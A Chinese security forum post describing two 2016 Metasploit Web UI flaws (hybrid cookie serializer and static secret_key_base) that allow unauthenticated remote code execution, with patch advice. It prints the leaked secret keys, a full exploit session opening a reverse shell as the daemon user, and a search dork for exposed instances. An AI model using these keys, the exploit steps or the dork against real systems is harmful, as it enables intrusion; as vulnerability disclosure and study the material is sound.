查看: 17368|回复: 2

Metasploit 反序列化漏洞

[复制链接]
  • TA的每日心情

    2024-11-13 20:06
  • 签到天数: 1628 天

    [LV.Master]伴坛终老

    发表于 2016-9-21 09:38:37 | 显示全部楼层 |阅读模式
    作者:adlab_mickey

    在本周Rapid7发布的4.12.0-2016091401补丁[0]描述中我们可以看到有2个漏洞,结合这2个漏洞远程攻击者可以非认证的在metasploit产品上执行任意代码,随后有研究人员也放出了POC攻击代码[1]

    PS:补丁、POC见文章最后参考文档


    漏洞1:Metasploit Web UI's config.action_dispatch.cookies_serializer 设置为 :hybrid


    OVE ID: OVE-20160904-0001

    私有披露日期: 2016-09-04

    公开披露日期: 2016-09-19

    厂商公告   : https://community.rapid7.com/com ... oit-4120-2016091401

    影响的版本 : Metasploit 4.12.0-2016061501 到 4.12.0-2016083001


    Rails应用会接受一个标记的cookies来处理会话,在Rails 4.1的以前版本中,使用Marshal进行序列化,允许实例化任意对象的反序列化。Rails 4.1引入JSON cookie序列化机制,默认不允许任意对象实例化,这种配置要安全的多。Rails 4.1也引入了’hybrid' cookie序列化,这将允许反序列化JSON和Marshal序列化的cookies,当cookie序列化设置为Marshal或hybird时,远程攻击者如果知道cookie signing key的值,就能够构造会话cookie,触发Marshal反序列化,实现任意代码执行。


    Metasploit Community, Express 和 Pro 版本的 Web UI在 Metasploit 4.12.0-2016091401之前的config.action_dispatch.cookies_serializer 值设置为 :hybrid,直到Metasploit 4.12.0-2016091401,才将其值设置为:json,因此用户需要更新到Metasploit 4.12.0-2016091401或更新版本才能有效防护此漏洞


    参考:

    [0] http://blog.bigbinary.com/2014/1 ... -4-1-and-above.html

    [1] https://www.rapid7.com/db/module ... ret_deserialization



    漏洞2:Metasploit Weekly Release Static secret_key_base pre-auth RCE

    OVE ID: OVE-20160904-0002

    私有披露日期: 2016-09-04

    公开披露日期: 2016-09-19

    厂商公告   :https://community.rapid7.com/com ... oit-4120-2016091401

    影响的版本 : Metasploit 4.12.0-2016061501 到 4.12.0-2016083001


    Metasploit Community, Express 和 Pro版本,WEB UI的secret_key_base值是固定已知的, 而且Metasploit的config.action_dispatch.cookies_serializer的值默认又为:hybrid,这导致攻击者可以远程非认证的构造cookies,实现反序列化任意Marshall对象,以daemon用户权限在装有Metasploit的机器上执行任意命令。

    已知的secret_key_base值如下:
    [PHP] 纯文本查看 复制代码
    4.12.0-2016061501,d25e9ad8c9a1558a6864bc38b1c79eafef479ccee5ad0b4b2ff6a917cd8db4c6b80d1bf1ea960f8ef922ddfebd4525fcff253a18dd78a18275311d45770e5c9103fc7b639ecbd13e9c2dbba3da5c20ef2b5cbea0308acfc29239a135724ddc902ccc6a378b696600a1661ed92666ead9cdbf1b684486f5c5e6b9b13226982dd7
    4.12.0-2016062101,99988ff528cc0e9aa0cc52dc97fe1dd1fcbedb6df6ca71f6f5553994e6294d213fcf533a115da859ca16e9190c53ddd5962ddd171c2e31a168fb8a8f3ef000f1a64b59a4ea3c5ec9961a0db0945cae90a70fd64eb7fb500662fc9e7569c90b20998adeca450362e5ca80d0045b6ae1d54caf4b8e6d89cc4ebef3fd4928625bfc
    4.12.0-2016072501,446db15aeb1b4394575e093e43fae0fc8c4e81d314696ac42599e53a70a5ebe9c234e6fa15540e1fc3ae4e99ad64531ab10c5a4deca10c20ba6ce2ae77f70e7975918fbaaea56ed701213341be929091a570404774fd65a0c68b2e63f456a0140ac919c6ec291a766058f063beeb50cedd666b178bce5a9b7e2f3984e37e8fde
    4.12.0-2016081001,61c64764ca3e28772bddd3b4a666d5a5611a50ceb07e3bd5847926b0423987218cfc81468c84a7737c23c27562cb9bf40bc1519db110bf669987c7bb7fd4e1850f601c2bf170f4b75afabf86d40c428e4d103b2fe6952835521f40b23dbd9c3cac55b543aef2fb222441b3ae29c3abbd59433504198753df0e70dd3927f7105a
    4.12.0-2016081201,23bbd1fdebdc5a27ed2cb2eea6779fdd6b7a1fa5373f5eeb27450765f22d3f744ad76bd7fbf59ed687a1aba481204045259b70b264f4731d124828779c99d47554c0133a537652eba268b231c900727b6602d8e5c6a73fe230a8e286e975f1765c574431171bc2af0c0890988cc11cb4e93d363c5edc15d5a15ec568168daf32
    4.12.0-2016083001,18edd3c0c08da473b0c94f114de417b3cd41dace1dacd67616b864cbe60b6628e8a030e1981cef3eb4b57b0498ad6fb22c24369edc852c5335e27670220ea38f1eecf5c7bb3217472c8df3213bc314af30be33cd6f3944ba524c16cafb19489a95d969ada268df37761c0a2b68c0eeafb1355a58a9a6a89c9296bfd606a79615
    unreleased build,b4bc1fa288894518088bf70c825e5ce6d5b16bbf20020018272383e09e5677757c6f1cc12eb39421eaf57f81822a434af10971b5762ae64cb1119054078b7201fa6c5e7aacdc00d5837a50b20a049bd502fcf7ed86b360d7c71942b983a547dde26a170bec3f11f42bee6a494dc2c11ae7dbd6d17927349cdcb81f0e9f17d22c


    攻击Metasploit本身的模块已经有安全研究人员开发出来了,路径为

    [PHP] 纯文本查看 复制代码
    exploit/multi/http/rails_secret_deserialization


    使用方法如下:

    [PHP] 纯文本查看 复制代码
    msf exploit(metasploit_static_secret_key_base) > info
           Name: Metasploit Web UI Static secret_key_base Value
         Module: exploit/multi/http/metasploit_static_secret_key_base
       Platform: Ruby
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2016-09-15
    Provided by:
      Justin Steven
      joernchen of Phenoelit <[email]joernchen@phenoelit.de[/email]>
    Available targets:
      Id  Name
      --  ----
      0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001
    Basic options:
      Name       Current Setting  Required  Description
      ----       ---------------  --------  -----------
      Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
      RHOST                       yes       The target address
      RPORT      3790             yes       The target port
      SSL        true             no        Negotiate SSL/TLS for outgoing connections
      TARGETURI  /                yes       The path to the Metasploit Web UI
      VHOST                       no        HTTP server virtual host
    Payload information:
    Description:
      This module exploits the Web UI for Metasploit Community, Express
      and Pro where one of a certain set of Weekly Releases have been
      applied. These Weekly Releases introduced a static secret_key_base
      value. Knowledge of the static secret_key_base value allows for
      deserialization of a crafted Ruby Object, achieving code execution.
      This module is based on
      exploits/multi/http/rails_secret_deserialization
    References:
      OVE (20160904-0002)
      [url]https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401[/url]
    msf exploit(metasploit_static_secret_key_base) > set RHOST 172.18.0.2
    RHOST => 172.18.0.2
    msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
    PAYLOAD => ruby/shell_reverse_tcp
    msf exploit(metasploit_static_secret_key_base) > set LHOST 172.18.0.1
    LHOST => 172.18.0.1
    msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
    LPORT => 4444
    msf exploit(metasploit_static_secret_key_base) > exploit
    [*] Started reverse TCP handler on 172.18.0.1:4444
    [*] Checking for cookie _ui_session
    [*] Searching for proper SECRET
    [*] Sending cookie _ui_session
    [*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:47590) at 2016-09-19 19:26:30 +1000
    id
    uid=1(daemon) gid=1(daemon) groups=1(daemon)
    exit
    ^C
    Abort session 1? [y/N]  y
    [*] 172.18.0.2 - Command shell session 1 closed.  Reason: User exit


    Rapid7 在 etasploit 4.12.0-2016091401版本中修复了这个问题,将会检测secret_key_base的值是否是默认值,如果是,将重新生成,因此用户要尽快升级到Metasploit 4.12.0-2016091401或以上版本


    参考:

    [0] https://github.com/rapid7/metasploit-framework/pull/7304

    [1] https://github.com/rapid7/metasploit-framework/pull/7341


    关键字:title:"metasploit is initializing"
    回复

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-9-23 08:47
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2016-9-22 07:45:52 | 显示全部楼层
    好一个黑吃黑。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-8-21 09:22
  • 签到天数: 181 天

    [LV.7]常住居民III

    发表于 2016-9-24 16:34:30 | 显示全部楼层
    这个怎么说呢,终日大雁被反打了
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-24 08:12 , Processed in 0.044518 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部